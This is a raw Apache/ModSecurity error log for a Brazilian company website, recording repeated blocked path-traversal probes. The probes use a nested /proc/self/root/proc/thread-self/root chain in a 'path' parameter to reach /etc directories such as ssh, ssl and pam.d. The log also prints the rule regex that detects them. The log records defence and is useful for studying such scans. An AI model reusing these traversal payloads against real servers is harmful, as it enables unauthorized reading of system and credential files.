[Tue Mar 17 20:58:24.040578 2026] [:error] [pid 25836:tid 140411674785536] [client 74.7.241.31:51142] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqoIh-PF_25v4hFRCR0wAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:58:32.672465 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.241.31:51152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqqOw_le52K8_3pV1ztwAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:58:42.133801 2026] [proxy_fcgi:error] [pid 25836:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50404] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:58:47.088982 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.241.31:51152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqt-w_le52K8_3pV1zwAAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:58:53.055044 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:57486] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqvda6ubjKNq_cu4YtpQAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:58:56.151306 2026] [mime_magic:error] [pid 2598:tid 140411691570944] (70014)End of file found: [client 74.7.241.31:57492] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var
[Tue Mar 17 20:58:56.634601 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:57504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqwOyqAr6etmhZHNpNywAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:59:04.137800 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50884] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:59:06.870252 2026] [:error] [pid 11088:tid 140411691570944] [client 74.7.241.31:40578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqymmqtCojLHvu5cKP9QAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:59:19.339137 2026] [:error] [pid 29151:tid 140411582465792] [client 74.7.241.31:34426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnq1_PqhzTj3BvfDX-vzwAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:59:26.142241 2026] [proxy_fcgi:error] [pid 6296:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51420] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:59:30.837782 2026] [mime_magic:error] [pid 6296:tid 140411590858496] (70014)End of file found: [client 74.7.243.128:35158] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/include/linux
[Tue Mar 17 20:59:32.355873 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:57832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnq5Na6ubjKNq_cu4YttwAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:59:34.828752 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.241.31:57842] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnq5uw_le52K8_3pV1zzgAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:59:38.790888 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.241.31:34164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnq6ew_le52K8_3pV1zzwAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:59:42.527148 2026] [:error] [pid 25836:tid 140411666392832] [client 74.7.241.31:34172] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnq7oh-PF_25v4hFRCR8QAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:59:44.673523 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:34178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnq8OyqAr6etmhZHNpN4gAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:59:48.145834 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51864] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:59:49.973406 2026] [:error] [pid 11088:tid 140411607643904] [client 74.7.241.31:34186] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnq9WmqtCojLHvu5cKQAQAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:00:00.989502 2026] [:error] [pid 6296:tid 140411607643904] [client 74.7.241.31:41438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnrAHIk7brgkOH-rIWzqgAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:00:10.117867 2026] [proxy_fcgi:error] [pid 6296:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52150] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:00:32.141921 2026] [proxy_fcgi:error] [pid 2598:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:52502] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:00:54.133785 2026] [proxy_fcgi:error] [pid 25836:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52874] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:01:08.374953 2026] [core:alert] [pid 31803:tid 140411683178240] [client 216.73.216.191:9238] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Tue Mar 17 21:01:16.153788 2026] [proxy_fcgi:error] [pid 29151:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53242] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:01:39.129820 2026] [proxy_fcgi:error] [pid 11088:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53582] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:01:40.142094 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:32900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnrZOyqAr6etmhZHNpOJQAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:01:47.215099 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.241.31:33482] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnra-w_le52K8_3pV1z7QAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:01:49.762506 2026] [:error] [pid 29151:tid 140411658000128] [client 74.7.241.31:40616] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnrbfPqhzTj3BvfDX-wDAAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:02:00.148028 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54026] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:02:01.418084 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:33210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnrecdf6f5d65gmYZRj8gAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Tue Mar 17 21:02:04.293456 2026] [:error] [pid 6296:tid 140411741927168] [client 74.7.243.128:59046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnrfHIk7brgkOH-rIWz6gAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:02:23.025841 2026] [proxy_fcgi:error] [pid 29151:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:54376] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:02:31.568877 2026] [mime_magic:error] [pid 31803:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:60652] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 21:02:31.568976 2026] [access_compat:error] [pid 31803:tid 140411716749056] [client 216.73.216.191:60652] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Tue Mar 17 21:02:46.125848 2026] [proxy_fcgi:error] [pid 25836:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:54760] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:03:08.124496 2026] [proxy_fcgi:error] [pid 11816:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:55116] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:03:21.332071 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.244.43:53602] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnrx9Y0UrI5A3LftIwm1QAAAYE"]
